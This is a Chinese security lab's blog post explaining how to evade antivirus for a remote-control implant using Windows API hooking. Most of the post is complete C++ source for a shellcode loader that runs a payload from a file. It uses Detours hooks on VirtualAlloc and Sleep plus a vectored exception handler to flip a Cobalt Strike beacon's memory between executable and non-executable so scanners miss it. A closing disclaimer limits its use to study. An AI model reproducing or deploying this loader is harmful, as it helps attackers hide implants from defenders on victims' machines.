創(chuàng)安實驗室專欄丨windows基于hook的遠控免殺_成都創(chuàng)信華通信息技術(shù)有限公司

新聞動態(tài) NEWS

咨詢服務(wù)熱線

400-6446-808

創(chuàng)安實驗室專欄

您的當前位置:首頁 > 創(chuàng)安實驗室專欄

創(chuàng)安實驗室專欄丨windows基于hook的遠控免殺

發(fā)布者：創(chuàng)信華通發(fā)布時間：2022-11-04 瀏覽量：586次

古語有云：“學如逆水行舟，不進則退。”面對如今隨時都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此，創(chuàng)信華通微信公眾號特開設(shè)“創(chuàng)安實驗室專欄”，以記錄創(chuàng)信華通創(chuàng)安實驗室在技術(shù)上的探索，加強同行間的交流，相互學習，共同進步。

windows基于hook的遠控免殺

HOOK的概念

鉤子(Hook)，是Windows消息處理機制的一個平臺，應(yīng)用程序可以在上面設(shè)置子程以監(jiān)視指定窗口的某種消息，而且所監(jiān)視的窗口可以是其他進程所創(chuàng)建的。當消息到達后，在目標窗口處理函數(shù)之前處理它。鉤子機制允許應(yīng)用程序截獲處理window消息或特定事件。其實就是改變程序執(zhí)行流程的一種技術(shù)的統(tǒng)稱。

免殺實現(xiàn)

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//創(chuàng)建一個命名的或無名的事件對象

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注冊向量異常處理程序，并返回異常處理程序的句柄

Hook(); //開始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//創(chuàng)建線程，指向線程函數(shù)的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//關(guān)閉線程

unsigned char* BinData = NULL;

size_t size = 0;

char* szFilePath = ".\\test.bin";

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申請內(nèi)存空間，返回首地址

memcpy(shellcode_addr, BinData, size);//從存儲區(qū) BinData復制 size個字節(jié)到存儲區(qū) shellcode_addr

VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//將shellcode_addr所在內(nèi)存區(qū)域設(shè)置為可執(zhí)行模式

(*(int(*)()) shellcode_addr)(); //執(zhí)行shellcode

UnHook();//結(jié)束hook

return 0;

}

主要函數(shù)

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)：用于設(shè)置shellcode區(qū)域的不可執(zhí)行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)：用于恢復shellcode區(qū)域的可執(zhí)行模式

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)：用于讀取二進制文件

void Hook()：HOOK

void UnHook()：接觸HOOK

void WINAPI NewSleep(DWORD dwMilliseconds)：顯示cs的sleep時間

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)：用于分配內(nèi)存地址和大小

設(shè)置Beacon_address所在內(nèi)存區(qū)域設(shè)置為可執(zhí)行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("異常錯誤碼:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("線程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

printf("恢復Beacon內(nèi)存屬性\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//設(shè)置Beacon_address所在內(nèi)存區(qū)域設(shè)置為可執(zhí)行模式

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

將shellcode_addr所在內(nèi)存區(qū)域設(shè)置為不可執(zhí)行模式

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes啟動\n");

while (true)

{

WaitForSingleObject(hEvent, INFINITE);//檢測hEvent事件的信號狀態(tài),INFINITE表示函數(shù)將僅在對象收到信號時返回

printf("設(shè)置Beacon內(nèi)存屬性不可執(zhí)行\(zhòng)n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//將shellcode_addr所在內(nèi)存區(qū)域設(shè)置為不可執(zhí)行模式

ResetEvent(hEvent); //設(shè)置事件hEvent為無信號狀態(tài)

}

return 0;

}

靜態(tài)免殺效果

動態(tài)免殺效果

完整代碼

#include "pch.h"

#include

#include "detours.h"

#include "detver.h"

#pragma comment(lib,"detours.lib")

LPVOID Beacon_address;

SIZE_T Beacon_data_len;

DWORD Beacon_Memory_address_flOldProtect;

HANDLE hEvent;

BOOL Vir_FLAG = TRUE;

LPVOID shellcode_addr;

static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;

//分配內(nèi)存地址和大小

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {

Beacon_data_len = dwSize;

Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);

printf("分配大小:%d", Beacon_data_len);

printf("分配地址:%llx \n", Beacon_address);

return Beacon_address;

}

static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;

//設(shè)置新的sleep地址

void WINAPI NewSleep(DWORD dwMilliseconds)

{

if (Vir_FLAG)

{

VirtualFree(shellcode_addr, 0, MEM_RELEASE);

Vir_FLAG = false;

}

printf("sleep時間:%d\n", dwMilliseconds);

SetEvent(hEvent);

OldSleep(dwMilliseconds);

}

void Hook()

{

DetourRestoreAfterWith(); //避免重復HOOK

DetourTransactionBegin(); // 開始HOOK

DetourUpdateThread(GetCurrentThread());//列入一個在DetourTransaction過程中要進行update的線程，為了避免崩潰

DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc); //多次調(diào)用DetourAttach，HOOK多個函數(shù)

DetourAttach((PVOID*)&OldSleep, NewSleep);

DetourTransactionCommit(); // 提交HOOK

}

void UnHook()

{

DetourTransactionBegin();//解除截獲過程

DetourUpdateThread(GetCurrentThread());//列入一個在DetourTransaction過程中要進行update的線程，為了避免崩潰

DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);//撤銷對NewVirtualAlloc的hook

DetourTransactionCommit();//解除hook

}

size_t GetSize(char* szFilePath)

{

size_t size;

FILE* f = fopen(szFilePath, "rb");

fseek(f, 0, SEEK_END);

size = ftell(f);//ftell配合fseek計算出文件大小

rewind(f);

fclose(f);

return size;

}

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)

{

unsigned char* p = NULL;

FILE* f = NULL;

size_t res = 0;

*size = GetSize(szFilePath);

if (*size == 0) return NULL;

f = fopen(szFilePath, "rb");

if (f == NULL)

{

printf("Binary file does not exists!\n");

return 0;

}

p = new unsigned char[*size];

// Read file

rewind(f);

res = fread(p, sizeof(unsigned char), *size, f);

fclose(f);

if (res == 0)

{

delete[] p;

return NULL;

}

return p;

}

BOOL is_Exception(DWORD64 Exception_addr)

{

if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address)

{

printf("地址符合:%llx\n", Exception_addr);

return true;

}

printf("地址不符合:%llx\n", Exception_addr);

return false;

}

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("異常錯誤碼:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("線程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

printf("恢復Beacon內(nèi)存屬性\n");

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes啟動\n");

while (true)

{

WaitForSingleObject(hEvent, INFINITE);//檢測hEvent事件的信號狀態(tài),INFINITE表示函數(shù)將僅在對象收到信號時返回

printf("設(shè)置Beacon內(nèi)存屬性不可執(zhí)行\(zhòng)n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//將shellcode_addr所在內(nèi)存區(qū)域設(shè)置為不可執(zhí)行模式

ResetEvent(hEvent); //設(shè)置事件hEvent為無信號狀態(tài)

}

return 0;

}

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//創(chuàng)建一個命名的或無名的事件對象

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注冊向量異常處理程序，并返回異常處理程序的句柄

Hook(); //開始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//創(chuàng)建線程，指向線程函數(shù)的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//關(guān)閉線程

unsigned char* BinData = NULL;

size_t size = 0;

char* szFilePath = ".\\test.bin";

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申請內(nèi)存空間，返回首地址

memcpy(shellcode_addr, BinData, size);//從存儲區(qū) BinData復制 size個字節(jié)到存儲區(qū) shellcode_addr

VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//將shellcode_addr所在內(nèi)存區(qū)域設(shè)置為可執(zhí)行模式

(*(int(*)()) shellcode_addr)(); //執(zhí)行shellcode

UnHook();//結(jié)束hook

return 0;

}

E·N·D

本文由創(chuàng)信華通創(chuàng)安攻防實驗室編輯。

本文僅限于個人學習和技術(shù)研究，由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為，均由使用者本人負責，本單位不為此承擔任何責任。創(chuàng)安攻防實驗室擁有對此文章的修改和解釋權(quán)，如欲轉(zhuǎn)載或傳播此文章，必須保證此文章的完整性，包括版權(quán)聲明等全部內(nèi)容。

如有侵權(quán)，請聯(lián)系后臺。

●

創(chuàng)安攻防實驗室

創(chuàng)安攻防實驗室，是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團隊，成立于2021年9月，主要研究紅藍對抗、重大安全保障、應(yīng)急響應(yīng)等方向。

創(chuàng)安攻防實驗室圓滿完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習活動，并積極參加各類網(wǎng)絡(luò)安全競賽，屢獲殊榮。

創(chuàng)安攻防實驗室秉承創(chuàng)信華通的發(fā)展理念，致力打造國內(nèi)一流網(wǎng)絡(luò)安全團隊。

上一條：Nmap部分常規(guī)使用

下一條：創(chuàng)安實驗室專欄丨TerraMaster TOS 信息泄漏到命令執(zhí)行

返回列表